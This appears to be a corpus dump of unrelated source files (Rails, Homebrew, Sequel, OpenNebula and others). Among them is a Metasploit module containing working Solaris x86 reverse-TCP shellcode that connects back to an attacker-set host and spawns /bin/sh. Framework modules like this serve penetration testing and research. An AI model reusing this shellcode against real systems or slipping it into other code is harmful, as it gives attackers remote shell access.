no_results_tna_link: context.t('document_filters.no_results.tna_link'),
category: result_type.capitalize,
}
if !documents.last_page? || !documents.first_page?
data[:more_pages?] = true
end
unless documents.last_page?
data[:next_page?] = true
data[:next_page] = documents.current_page + 1
data[:next_page_url] = url(page: documents.current_page + 1)
data[:next_page_web_url] = url(page: documents.current_page + 1, format: nil)
end
unless documents.first_page?
data[:prev_page?] = true
data[:prev_page] = documents.current_page - 1
data[:prev_page_url] = url(page: documents.current_page - 1)
data[:prev_page_web_url] = url(page: documents.current_page - 1, format: nil)
end
data
end
def url(override_params)
context.url_for(context.params.permit!.merge(override_params).merge("_" => nil))
end
def date_from
from_date ? from_date.to_s(:uk_short) : nil
end
def date_to
to_date ? to_date.to_s(:uk_short) : nil
end
def documents
if document_decorator
Whitehall::Decorators::CollectionDecorator.new(
filter.documents, document_decorator, context
)
else
filter.documents
end
end
def result_type
"document"
end
def filtering_command_and_act_papers?
selected_official_document_status == "command_and_act_papers"
end
def filtering_command_papers_only?
selected_official_document_status == "command_papers_only"
end
def filtering_act_papers_only?
selected_official_document_status == "act_papers_only"
end
end
| 31.05 | 92 | 0.714976 |
bbd9fba901659b68257aa7c07c42f116ee847c96 | 662 | Rails.application.routes.draw do
root 'home#index'
$cluster.models.each do |model|
name = model.name.underscore
controller name.pluralize do
collection_path = "/#{ name.pluralize }"
collection_path << "(/s/:series)" if model.acts_as_seriables?
collection_path << "(/p/:page)" if model.acts_as_paginables?
collection_path << "(/o/:pool)" if model.acts_as_poolables?
instance_path = "/#{ name }"
instance_path << if model.acts_as_taggables?
"/:tag"
else
"/:id"
end
get collection_path => :index, as: name.pluralize
get instance_path => :show, as: name
end
end
end
| 24.518519 | 67 | 0.626888 |
87e516165ac59a31184148de88a09ac3801a875e | 752 | ClimateWatchEngine.s3_bucket_name = Rails.application.secrets.s3_bucket_name
# Locations engine initializer
# NOTE(review): CW_FILES_PREFIX is defined elsewhere (not visible in this
# file); it is assumed to be the root prefix of the data-files location.
require 'locations'
Locations.locations_filepath = "#{CW_FILES_PREFIX}locations/locations.csv"
# Carto SQL API endpoint returning country name, ISO code and geometry.
Locations.cartodb_url =
  'https://wri-01.carto.com/api/v2/sql?q=SELECT%20name_engli,iso,topojson,centroid%20FROM%20gadm28_countries'
Locations.location_groupings_filepath = "#{CW_FILES_PREFIX}locations_members/locations_groupings.csv"
# HistoricalEmissions engine initializer
require 'historical_emissions'
HistoricalEmissions.meta_sectors_filepath = "#{CW_FILES_PREFIX}historical_emissions/historical_emissions_metadata_sectors.csv"
HistoricalEmissions.data_cait_filepath = "#{CW_FILES_PREFIX}historical_emissions/historical_emissions_data.csv"
| 53.714286 | 126 | 0.864362 |
03b1847d5afabd96d6cc69269912edc4abceda13 | 339 | n, M, P, Q = gets.split.map(&:to_i)
fail_leaves = {}
(1..12).each do |m|
fail_leaves[m] = M
if m.between?(P, P + Q - 1) || (m + 12).between?(P, P + Q - 1)
fail_leaves[m] += M
end
end
answer, month = 0, 1
loop do
answer += 1
n -= fail_leaves[month]
break if n <= 0
month += 1
month = 1 if month > 12
end
puts answer | 15.409091 | 64 | 0.551622 |
87fec5390cc42cbd5463840a75170d6e03af3806 | 650 | cask "frescobaldi" do
version "3.1.3"
sha256 "a7c53b67015c8515ae31102a53e16a9eca6b0e5c98ced6e859bb834e3e12f29c"
url "https://github.com/frescobaldi/frescobaldi/releases/download/v#{version}/Frescobaldi-#{version}-x86_64.dmg",
verified: "github.com/frescobaldi/frescobaldi/"
name "Frescobaldi"
desc "LilyPond editor"
homepage "https://frescobaldi.org/"
livecheck do
url "https://github.com/frescobaldi/frescobaldi/releases/"
strategy :page_match
regex(/Frescobaldi[._-]v?(\d+(?:\.\d+)+)[._-]x86[._-]64\.dmg/i)
end
app "Frescobaldi.app"
zap trash: "~/Library/Preferences/org.frescobaldi.frescobaldi.plist"
end
| 30.952381 | 115 | 0.726154 |
7ab0269d1ac4ff3febc0fcaa52bde7a5f545b302 | 774 | # encoding: utf-8
module Gallifreyian
module Translation
class I18nKey
include Mongoid::Document
include Mongoid::Translation
# Field
#
field :state, type: Symbol
# Validations
#
validates :language, presence: true
validate :valid_datum?
def validate
self.state = :valid
end
def validate!
validate
self.i18n_key.save
end
def validation_pending?
self.state == :validation_pending
end
private
def valid_datum?
if self.state.nil?
self.state = :valid
end
unless self.datum.nil? || self.datum.is_a?(String)
errors.add(:datum, :not_a_string)
end
end
end
end
end
| 18 | 58 | 0.564599 |
261a0460c0de007d1f762784a44de4b66be65e7e | 4,301 | require 'spec_helper'
describe Hydra::PolicyAwareAccessControlsEnforcement do
before(:all) do
class MockController
include Hydra::AccessControlsEnforcement
include Hydra::PolicyAwareAccessControlsEnforcement
attr_accessor :params
def user_key
current_user.user_key
end
def session
end
end
@sample_policies = []
# user discover
policy1 = Hydra::AdminPolicy.new(:pid=>"test:policy1")
policy1.default_permissions = [{:type=>"user", :access=>"discover", :name=>"sara_student"}]
policy1.save
@sample_policies << policy1
# user read
policy2 = Hydra::AdminPolicy.new(:pid=>"test:policy2")
policy2.default_permissions = [{:type=>"user", :access=>"read", :name=>"sara_student"}]
policy2.save
@sample_policies << policy2
# user edit
policy3 = Hydra::AdminPolicy.new(:pid=>"test:policy3")
policy3.default_permissions = [{:type=>"user", :access=>"edit", :name=>"sara_student"}]
policy3.save
@sample_policies << policy3
# group discover
policy4 = Hydra::AdminPolicy.new(:pid=>"test:policy4")
policy4.default_permissions = [{:type=>"group", :access=>"discover", :name=>"africana-104-students"}]
policy4.save
@sample_policies << policy4
# group read
policy5 = Hydra::AdminPolicy.new(:pid=>"test:policy5")
policy5.default_permissions = [{:type=>"group", :access=>"read", :name=>"africana-104-students"}]
policy5.save
@sample_policies << policy5
# group edit
policy6 = Hydra::AdminPolicy.new(:pid=>"test:policy6")
policy6.default_permissions = [{:type=>"group", :access=>"edit", :name=>"africana-104-students"}]
policy6.save
@sample_policies << policy6
# no access
policy7 = Hydra::AdminPolicy.create(:pid=>"test:policy7")
@sample_policies << policy7
@policies_with_access = @sample_policies.select { |p| p.pid != policy7.pid }
end
after(:all) do
@sample_policies.each {|p| p.delete }
end
subject { MockController.new }
before do
@solr_parameters = {}
@user_parameters = {}
@user = FactoryGirl.build(:sara_student)
RoleMapper.stub(:roles).with(@user.user_key).and_return(@user.roles)
subject.stub(:current_user).and_return(@user)
end
describe "policies_with_access" do
it "should return the policies that provide discover permissions" do
@policies_with_access.map {|p| p.pid }.each do |p|
subject.policies_with_access.should include(p)
end
end
it "should return the policies that provide discover permissions" do
subject.policies_with_access.should_not include("test:policy7")
end
it "should allow you to configure which model to use for policies" do
Hydra.stub(:config).and_return( {:permissions=>{:policy_class => ModsAsset}} )
ModsAsset.should_receive(:find_with_conditions).and_return([])
subject.policies_with_access
end
end
describe "apply_gated_discovery" do
it "should include policy-aware query" do
# stubbing out policies_with_access because solr doesn't always return them in the same order.
policy_pids = (1..6).map {|n| "test:policy#{n}"}
subject.should_receive(:policies_with_access).and_return(policy_pids)
subject.apply_gated_discovery(@solr_parameters, @user_parameters)
@solr_parameters[:fq].first.should include(" OR (is_governed_by_s:info\\:fedora/test\\:policy1 OR is_governed_by_s:info\\:fedora/test\\:policy2 OR is_governed_by_s:info\\:fedora/test\\:policy3 OR is_governed_by_s:info\\:fedora/test\\:policy4 OR is_governed_by_s:info\\:fedora/test\\:policy5 OR is_governed_by_s:info\\:fedora/test\\:policy6)")
end
it "should not change anything if there are no clauses to add" do
subject.stub(:policy_clauses).and_return(nil)
subject.apply_gated_discovery(@solr_parameters, @user_parameters)
@solr_parameters[:fq].first.should_not include(" OR (is_governed_by_s:info\\:fedora/test\\:policy1 OR is_governed_by_s:info\\:fedora/test\\:policy2 OR is_governed_by_s:info\\:fedora/test\\:policy3 OR is_governed_by_s:info\\:fedora/test\\:policy4 OR is_governed_by_s:info\\:fedora/test\\:policy5 OR is_governed_by_s:info\\:fedora/test\\:policy6)")
end
end
end
| 39.824074 | 352 | 0.695187 |
21884e89afa7aada65501941eb981775e1f52c62 | 2,914 | require 'rbconfig'
require_relative '../utils/snapshot_helpers.rb'
include Utils::SnapshotHelpers
namespace :dgidb do
if Rails.env.production?
data_submodule_path = File.join(Rails.root, 'public', 'data')
else
data_submodule_path = File.join(Rails.root, 'data')
end
data_file = File.join(data_submodule_path, 'data.sql')
version_file = File.join(Rails.root, 'VERSION')
database_name = Rails.configuration.database_configuration[Rails.env]['database']
host = Rails.configuration.database_configuration[Rails.env]['host']
username = Rails.configuration.database_configuration[Rails.env]['username']
desc 'Remove a source from the database given the source_db_name'
task :remove_source, [:source_db_name] => :environment do |_, args|
Utils::Database.delete_source(args[:source_db_name])
end
desc 'set up path for macs running Postgres.app'
task :setup_path do
#special case for macs running Postgres.app
if RbConfig::CONFIG['host_os'] =~ /darwin/ && File.exist?( '/Applications/Postgres.app' )
puts 'Found Postgres.app'
ENV['PATH'] = "/Applications/Postgres.app/Contents/Versions/latest/bin:#{ENV['PATH']}"
end
# MacPorts Handling
macports_postgres = Dir.glob( '/opt/local/lib/postgresql*/bin')
if RbConfig::CONFIG['host_os'] =~ /darwin/ && macports_postgres.any?
macports_postgres_path = macports_postgres.last
macports_postgres_version = File.basename(File.dirname(macports_postgres_path))
puts "Found MacPorts #{macports_postgres_version}"
ENV['PATH'] = "#{macports_postgres_path}:#{ENV['PATH']}"
end
# Homebrew Handling (TODO)
end
desc 'create a dump of the current local database'
task dump_local: ['setup_path'] do
if username.blank?
system "pg_dump -T schema_migrations -E UTF8 -a -f #{data_file} -h #{host} #{database_name}"
else
system "pg_dump -T schema_migrations -E UTF8 -a -f #{data_file} -U #{username} -h #{host} #{database_name}"
end
end
desc 'load the source controlled db dump and schema into the local db, blowing away what is currently there'
task load_local: ['setup_path', 'db:drop', 'db:create', 'db:structure:load'] do
download_data_dump(data_file)
system "psql -h #{host} -d #{database_name} -f #{data_file}"
Rails.cache.clear
end
desc 'create a new data snapshot'
task :create_snapshot, [:message, :version_type] do |t, args|
args.with_defaults(version_type: :patch)
raise 'You must supply a commit message!' unless args[:message]
Rake::Task['dgidb:dump_local'].execute
in_git_stash do
pull_latest
new_version = update_version(version_file, args[:version_type].to_sym)
commit_db_update(data_submodule_path, data_file, args[:message])
commit_data_submodule_update(args[:message], data_submodule_path, version_file)
create_tag(new_version)
push_changes
end
end
end
| 38.853333 | 113 | 0.715511 |
b9914774d85c9a2b3c14c25a15c0c741cc6e8967 | 6,782 | Sequel.require 'adapters/jdbc/transactions'
module Sequel
  module JDBC
    # Database and Dataset support for HSQLDB databases accessed via JDBC.
    module HSQLDB
      # Instance methods for HSQLDB Database objects accessed via JDBC.
      module DatabaseMethods
        # Matches the auto-generated names HSQLDB gives primary key indexes.
        PRIMARY_KEY_INDEX_RE = /\Asys_idx_sys_pk_/i.freeze

        include ::Sequel::JDBC::Transactions

        # HSQLDB uses the :hsqldb database type.
        def database_type
          :hsqldb
        end

        # HSQLDB uses an IDENTITY sequence as the default value for primary
        # key columns.
        def serial_primary_key_options
          {:primary_key => true, :type => :integer, :identity=>true, :start_with=>1}
        end

        # The version of the database, as an integer (e.g 2.2.5 -> 20205).
        # Memoized; note that if the version string does not match x.y.z the
        # begin block yields nil, so ||= will re-query on the next call.
        def db_version
          @db_version ||= begin
            v = get{DATABASE_VERSION(){}}
            if v =~ /(\d+)\.(\d+)\.(\d+)/
              $1.to_i * 10000 + $2.to_i * 100 + $3.to_i
            end
          end
        end

        private

        # HSQLDB specific SQL for renaming columns, and changing column types and/or nullity.
        def alter_table_sql(table, op)
          case op[:op]
          when :rename_column
            "ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} RENAME TO #{quote_identifier(op[:new_name])}"
          when :set_column_type
            "ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} SET DATA TYPE #{type_literal(op)}"
          when :set_column_null
            "ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} SET #{op[:null] ? 'NULL' : 'NOT NULL'}"
          else
            super
          end
        end

        # HSQLDB requires parens around the SELECT, and the WITH DATA syntax.
        def create_table_as_sql(name, sql, options)
          "#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA"
        end

        # Use IDENTITY() to get the last inserted id.
        def last_insert_id(conn, opts={})
          statement(conn) do |stmt|
            sql = 'CALL IDENTITY()'
            rs = log_yield(sql){stmt.executeQuery(sql)}
            rs.next
            rs.getInt(1)
          end
        end

        # Primary key indexes appear to start with sys_idx_sys_pk_ on HSQLDB
        def primary_key_index_re
          PRIMARY_KEY_INDEX_RE
        end

        # If an :identity option is present in the column, add the necessary IDENTITY SQL.
        # It's possible to use an IDENTITY type, but that defaults the sequence to start
        # at 0 instead of 1, and we don't want that.
        def type_literal(column)
          if column[:identity]
            sql = "#{super} GENERATED BY DEFAULT AS IDENTITY"
            if sw = column[:start_with]
              sql << " (START WITH #{sw.to_i}"
              sql << " INCREMENT BY #{column[:increment_by].to_i}" if column[:increment_by]
              sql << ")"
            end
            sql
          else
            super
          end
        end
      end

      # Dataset class for HSQLDB datasets accessed via JDBC.
      class Dataset < JDBC::Dataset
        # Ruby bitwise operators mapped to the HSQLDB SQL functions that
        # implement them.
        BITWISE_METHOD_MAP = {:& =>:BITAND, :| => :BITOR, :^ => :BITXOR}
        BOOL_TRUE = 'TRUE'.freeze
        BOOL_FALSE = 'FALSE'.freeze
        # HSQLDB does support common table expressions, but the support is broken.
        # CTEs operate more like temporary tables or views, lasting longer than the duration of the expression.
        # CTEs in earlier queries might take precedence over CTEs with the same name in later queries.
        # Also, if any CTE is recursive, all CTEs must be recursive.
        # If you want to use CTEs with HSQLDB, you'll have to manually modify the dataset to allow it.
        SELECT_CLAUSE_METHODS = clause_methods(:select, %w'select distinct columns from join where group having compounds order limit lock')
        SQL_WITH_RECURSIVE = "WITH RECURSIVE ".freeze
        APOS = Dataset::APOS
        # String#unpack format used to hex-encode blob data.
        HSTAR = "H*".freeze
        BLOB_OPEN = "X'".freeze
        BITCOMP_OPEN = "((0 - ".freeze
        BITCOMP_CLOSE = ") - 1)".freeze
        # Dummy FROM clause used when the dataset has no source table, since
        # HSQLDB requires a FROM clause in every SELECT.
        DEFAULT_FROM = " FROM (VALUES (0))".freeze
        TIME_FORMAT = "'%H:%M:%S'".freeze

        # Handle HSQLDB specific case insensitive LIKE and bitwise operator support.
        def complex_expression_sql_append(sql, op, args)
          case op
          when :ILIKE, :"NOT ILIKE"
            # Case-insensitive LIKE is emulated by upper-casing both sides.
            super(sql, (op == :ILIKE ? :LIKE : :"NOT LIKE"), [SQL::Function.new(:ucase, args.at(0)), SQL::Function.new(:ucase, args.at(1)) ])
          when :&, :|, :^
            op = BITWISE_METHOD_MAP[op]
            sql << complex_expression_arg_pairs(args){|a, b| literal(SQL::Function.new(op, a, b))}
          when :<<
            # HSQLDB has no shift operators; emulate with */ POWER(2, n).
            sql << complex_expression_arg_pairs(args){|a, b| "(#{literal(a)} * POWER(2, #{literal(b)}))"}
          when :>>
            sql << complex_expression_arg_pairs(args){|a, b| "(#{literal(a)} / POWER(2, #{literal(b)}))"}
          when :%
            sql << complex_expression_arg_pairs(args){|a, b| "MOD(#{literal(a)}, #{literal(b)})"}
          when :'B~'
            # Bitwise NOT emulated as ((0 - x) - 1).
            sql << BITCOMP_OPEN
            literal_append(sql, args.at(0))
            sql << BITCOMP_CLOSE
          else
            super
          end
        end

        # HSQLDB requires recursive CTEs to have column aliases.
        def recursive_cte_requires_column_aliases?
          true
        end

        # HSQLDB does not support IS TRUE.
        def supports_is_true?
          false
        end

        private

        # Use string in hex format for blob data.
        def literal_blob_append(sql, v)
          sql << BLOB_OPEN << v.unpack(HSTAR).first << APOS
        end

        # HSQLDB uses FALSE for false values.
        def literal_false
          BOOL_FALSE
        end

        # HSQLDB handles fractional seconds in timestamps, but not in times
        def literal_sqltime(v)
          v.strftime(TIME_FORMAT)
        end

        # HSQLDB uses TRUE for true values.
        def literal_true
          BOOL_TRUE
        end

        # HSQLDB does not support CTEs well enough for Sequel to enable support for them.
        def select_clause_methods
          SELECT_CLAUSE_METHODS
        end

        # Use a default FROM table if the dataset does not contain a FROM table.
        def select_from_sql(sql)
          if @opts[:from]
            super
          else
            sql << DEFAULT_FROM
          end
        end

        # Use WITH RECURSIVE instead of WITH if any of the CTEs is recursive
        def select_with_sql_base
          opts[:with].any?{|w| w[:recursive]} ? SQL_WITH_RECURSIVE : super
        end
      end
    end
  end
end
| 36.659459 | 143 | 0.58095 |
38990d00abf3c1e69e20f4c040317fe0f0d09b2d | 4,500 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Solaris
  include Msf::Sessions::CommandShellOptions

  # Single-stage Solaris/x86 reverse-TCP command shell payload.
  #
  # The 'Offsets' hash tells the framework where to patch the connect-back
  # target into the shellcode at generation time: LHOST is a 4-byte address
  # at byte offset 15, LPORT a network-order 16-bit value at offset 21.
  # Do NOT edit the shellcode bytes without updating these offsets.
  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Solaris Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => 'Ramon de C Valle',
      'License'       => MSF_LICENSE,
      'Platform'      => 'solaris',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'LHOST' => [ 15, 'ADDR' ],
              'LPORT' => [ 21, 'n' ],
            },
          'Payload' =>
            # socket() -> connect() back to LHOST:LPORT, dup the socket onto
            # stdio, then execve("/bin//sh") — per-instruction notes follow.
            "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff                #
            "\x6a\x65"             +# pushl $0x65                      #
            "\x89\xe6"             +# movl %esp,%esi                   #
            "\xf7\x56\x04"         +# notl 0x04(%esi)                  #
            "\xf6\x16"             +# notb (%esi)                      #
            "\x68\x7f\x01\x01\x01" +# pushl $0x0101017f                #
            "\x66\x68\x04\xd2"     +# pushw $0xd204                    #
            "\x66\x6a\x02"         +# pushw $0x02                      #
            "\x89\xe7"             +# movl %esp,%edi                   #
            "\x6a\x02"             +# pushl $0x02                      #
            "\x31\xc0"             +# xorl %eax,%eax                   #
            "\x50"                 +# pushl %eax                       #
            "\x50"                 +# pushl %eax                       #
            "\x6a\x02"             +# pushl $0x02                      #
            "\x6a\x02"             +# pushl $0x02                      #
            "\xb0\xe6"             +# movb $0xe6,%al                   #
            "\xff\xd6"             +# call *%esi                       #
            "\x6a\x10"             +# pushl $0x10                      #
            "\x57"                 +# pushl %edi                       #
            "\x50"                 +# pushl %eax                       #
            "\x31\xc0"             +# xorl %eax,%eax                   #
            "\xb0\xeb"             +# movb $0xeb,%al                   #
            "\xff\xd6"             +# call *%esi                       #
            "\x5b"                 +# popl %ebx                        #
            "\x53"                 +# pushl %ebx                       #
            "\x6a\x09"             +# pushl $0x09                      #
            "\x53"                 +# pushl %ebx                       #
            "\x6a\x3e"             +# pushl $0x3e                      #
            "\x58"                 +# popl %eax                        #
            "\xff\xd6"             +# call *%esi                       #
            "\xff\x4f\xe0"         +# decl -0x20(%edi)                 #
            "\x79\xf6"             +# jns <cntsockcode+57>             #
            "\x50"                 +# pushl %eax                       #
            "\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f                #
            "\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f                #
            "\x89\xe3"             +# movl %esp,%ebx                   #
            "\x50"                 +# pushl %eax                       #
            "\x53"                 +# pushl %ebx                       #
            "\x89\xe1"             +# movl %esp,%ecx                   #
            "\x50"                 +# pushl %eax                       #
            "\x51"                 +# pushl %ecx                       #
            "\x53"                 +# pushl %ebx                       #
            "\xb0\x3b"             +# movb $0x3b,%al                   #
            "\xff\xd6"              # call *%esi                       #
        }
    ))
  end

end
| 53.571429 | 78 | 0.292889 |
6266f936ec858a8b12e06b4a87a56a8cc4c243c3 | 3,154 | # -------------------------------------------------------------------------- #
# Copyright 2002-2022, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
require 'opennebula/pool'
module OpenNebula

    # Pool of Hook objects, retrieved over the OpenNebula XML-RPC API.
    class HookPool < Pool

        #######################################################################
        # Constants and Class attribute accessors
        #######################################################################

        # XML-RPC method names used by this pool.
        HOOK_POOL_METHODS = {
            :info => 'hookpool.info'
        }

        #######################################################################
        # Class constructor & Pool Methods
        #######################################################################

        # +client+  a Client object representing an XML-RPC connection
        # +user_id+ used to refer to a Pool with Hooks from that user
        def initialize(client, user_id = -1)
            super('HOOK_POOL', 'HOOK', client)

            @user_id = user_id
        end

        # Factory method that builds a Hook object out of its XML description.
        def factory(element_xml)
            OpenNebula::Hook.new(element_xml, @client)
        end

        #######################################################################
        # XML-RPC Methods for the Hook Object
        #######################################################################

        # Retrieves all or part of the Hooks in the pool. Accepts either no
        # arguments (uses the pool's user id) or an explicit filter triple
        # (filter_flag, start_id, end_id); anything else is a no-op.
        def info(*args)
            if args.empty?
                info_filter(HOOK_POOL_METHODS[:info], @user_id, -1, -1)
            elsif args.size == 3
                info_filter(HOOK_POOL_METHODS[:info], args[0], args[1], args[2])
            end
        end

        def info_all
            super(HOOK_POOL_METHODS[:info])
        end

        def info_mine
            super(HOOK_POOL_METHODS[:info])
        end

        def info_group
            super(HOOK_POOL_METHODS[:info])
        end

        alias_method :info!, :info
        alias_method :info_all!, :info_all
        alias_method :info_mine!, :info_mine
        alias_method :info_group!, :info_group

    end
end
| 38 | 80 | 0.417565 |
e86fc264bf6cc2c56fe5f9b5d259106b976b9cd5 | 404 | module Imgproxy
module OptionsExtractors
    # Runs several extractors as one group and trims trailing nils from
    # the combined result.
    class Group
      # @param extractors objects responding to #extract(raw)
      def initialize(*extractors)
        @extractors = extractors
      end

      # Applies each extractor to +raw+ in order and returns the list of
      # results with any run of nils at the tail removed (inner nils and
      # false values are preserved).
      def extract(raw)
        extracted = @extractors.map { |e| e.extract(raw) }
        extracted.pop until extracted.empty? || !extracted.last.nil?
        extracted
      end
    end
end
end
| 23.764706 | 71 | 0.641089 |
3326ecceba4087c11b11eaaec242696ae837da57 | 148 | class SalaryQuestionPresenter < QuestionPresenter
def response_label(value)
value_for_interpolation(SmartAnswer::Salary.new(value))
end
end
| 24.666667 | 59 | 0.817568 |
08185cf89f5272f04a196ebde44119e179288e32 | 2,583 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Dns::Mgmt::V2016_04_01
  module Models
    #
    # The resource model definition for a ARM tracked top level resource.
    #
    # NOTE: this file is generated by AutoRest — prefer regenerating over
    # hand edits (see the header of this file).
    #
    class TrackedResource < Resource

      include MsRestAzure

      # @return [Hash{String => String}] Resource tags.
      attr_accessor :tags

      # @return [String] The geo-location where the resource lives
      attr_accessor :location


      #
      # Mapper for TrackedResource class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'TrackedResource',
          type: {
            name: 'Composite',
            class_name: 'TrackedResource',
            model_properties: {
              # id/name/type are read-only ARM envelope fields inherited
              # from Resource.
              id: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'id',
                type: {
                  name: 'String'
                }
              },
              name: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              type: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'type',
                type: {
                  name: 'String'
                }
              },
              tags: {
                client_side_validation: true,
                required: false,
                serialized_name: 'tags',
                type: {
                  name: 'Dictionary',
                  value: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'StringElementType',
                    type: {
                      name: 'String'
                    }
                  }
                }
              },
              # location is the only required property on a tracked resource.
              location: {
                client_side_validation: true,
                required: true,
                serialized_name: 'location',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 27.774194 | 72 | 0.44096 |
38015c6452b712a8eed370d8ad3a5b6469d6682d | 5,047 | #
# Be sure to run `pod spec lint LSDateFormat.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|

  # ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # NOTE(review): summary and description are still the CocoaPods template
  # placeholders — `pod spec lint` will warn/fail until they are filled in.
  s.name         = "LSDateFormat"
  s.version      = "0.0.1"
  s.summary      = "A short description of LSDateFormat."

  s.description  = <<-DESC
                   DESC

  # NOTE(review): placeholder URL — point at the real project page.
  s.homepage     = "http://EXAMPLE/LSDateFormat"
  # s.screenshots  = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"

  # ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # NOTE(review): "MIT (example)" is the template value; use a real license
  # identifier or the :type/:file hash form below.
  s.license      = "MIT (example)"
  # s.license      = { :type => "MIT", :file => "FILE_LICENSE" }

  # ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  s.author             = { "Crazy_Lin" => "[email protected]" }
  # Or just: s.author    = "Crazy_Lin"
  # s.authors            = { "Crazy_Lin" => "[email protected]" }
  # s.social_media_url   = "http://twitter.com/Crazy_Lin"

  # ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # No platform restriction is declared; uncomment one of these to constrain
  # the pod to a platform / deployment target.
  # s.platform     = :ios
  # s.platform     = :ios, "5.0"
  # s.ios.deployment_target = "5.0"
  # s.osx.deployment_target = "10.7"
  # s.watchos.deployment_target = "2.0"
  # s.tvos.deployment_target = "9.0"

  # ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # NOTE(review): placeholder git URL — must point at the real repository
  # before the pod can be pushed.
  s.source       = { :git => "http://EXAMPLE/LSDateFormat.git", :tag => "#{s.version}" }

  # ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  s.source_files  = "Classes", "Classes/**/*.{h,m}"
  s.exclude_files = "Classes/Exclude"
  # s.public_header_files = "Classes/**/*.h"

  # ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # s.resource  = "icon.png"
  # s.resources = "Resources/*.png"
  # s.preserve_paths = "FilesToSave", "MoreFilesToSave"

  # ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # s.framework  = "SomeFramework"
  # s.frameworks = "SomeFramework", "AnotherFramework"
  # s.library   = "iconv"
  # s.libraries = "iconv", "xml2"

  # ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
  # s.requires_arc = true
  # s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
  # s.dependency "JSONKit", "~> 1.4"

end
| 36.572464 | 93 | 0.59045 |
e2b79a66188639aa04821eb831114a86a2aa59fe | 1,423 | class Bitchx < Formula
desc "BitchX IRC client"
homepage "http://bitchx.sourceforge.net/"
url "https://downloads.sourceforge.net/project/bitchx/ircii-pana/bitchx-1.2.1/bitchx-1.2.1.tar.gz"
sha256 "2d270500dd42b5e2b191980d584f6587ca8a0dbda26b35ce7fadb519f53c83e2"
bottle do
sha256 "ebb3d7dd9342843c47964d4c545e76136aeb4e200f9495cd2767d0e31fc37181" => :yosemite
sha256 "494fd5d6084f70158e82d49a067439770935d5aeeb6223d1c229a27e6f7f9e8f" => :mavericks
sha256 "f0d7c9d8eaccd526c39037903121e1e6a026ce93988610ed32ad3b5f864fb630" => :mountain_lion
end
depends_on "openssl"
def install
plugins = %w[acro aim arcfour amp autocycle blowfish cavlink encrypt
fserv hint identd nap pkga possum qbx qmail]
args = %W[
--prefix=#{prefix}
--with-ssl
--with-plugins=#{plugins * ","}
--enable-ipv6
--mandir=#{man}
]
system "./configure", *args
system "make"
system "make", "install"
end
def caveats; <<-EOS.undent
On case-sensitive filesytems, it is necessary to run `BitchX` not `bitchx`.
For best visual appearance, your terminal emulator may need:
* Character encoding set to Western (ISO Latin 1).
(or a similar, compatible encoding)
* A font capable of extended ASCII characters:
See: https://www.google.com/search?q=perfect+dos+vga+437
EOS
end
test do
system bin/"BitchX", "-v"
end
end
| 31.622222 | 100 | 0.704146 |
1a6446ff2ef2cf0fdb8c83ba6c7cad08ad007461 | 2,202 | class OptQuestionsController < ApplicationController
  # NOTE: every action in this controller is commented out below — the
  # controller is currently inert and the dead code is kept only for reference.
# skip_before_filter :authorize
# skip_before_filter :authorize2
#
# def new
# @user = User.find(params[:user_id])
# @event = Event.find(params[:event_id])
# @optq = @event.opt_questions.new
#
# respond_to do |format|
# format.html # new.html.erb
# format.json { render json: @event }
# end
# end
#
# def create
# @event = Event.find(params[:event_id])
# @user = @event.user_id
